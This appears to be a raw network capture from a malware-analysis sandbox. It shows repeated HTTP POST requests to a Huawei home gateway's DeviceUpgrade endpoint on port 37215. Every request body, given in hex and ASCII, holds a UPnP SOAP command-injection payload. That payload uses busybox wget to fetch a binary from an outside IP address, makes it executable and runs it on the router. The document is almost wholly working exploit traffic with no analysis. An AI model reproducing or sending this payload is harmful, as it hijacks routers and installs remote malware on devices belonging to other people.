                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658413887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746061087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889980078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241714001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945537090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376631021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191229105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      114192.168.2.1436526102.177.119.17737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.733176947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658413887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746061087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889980078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
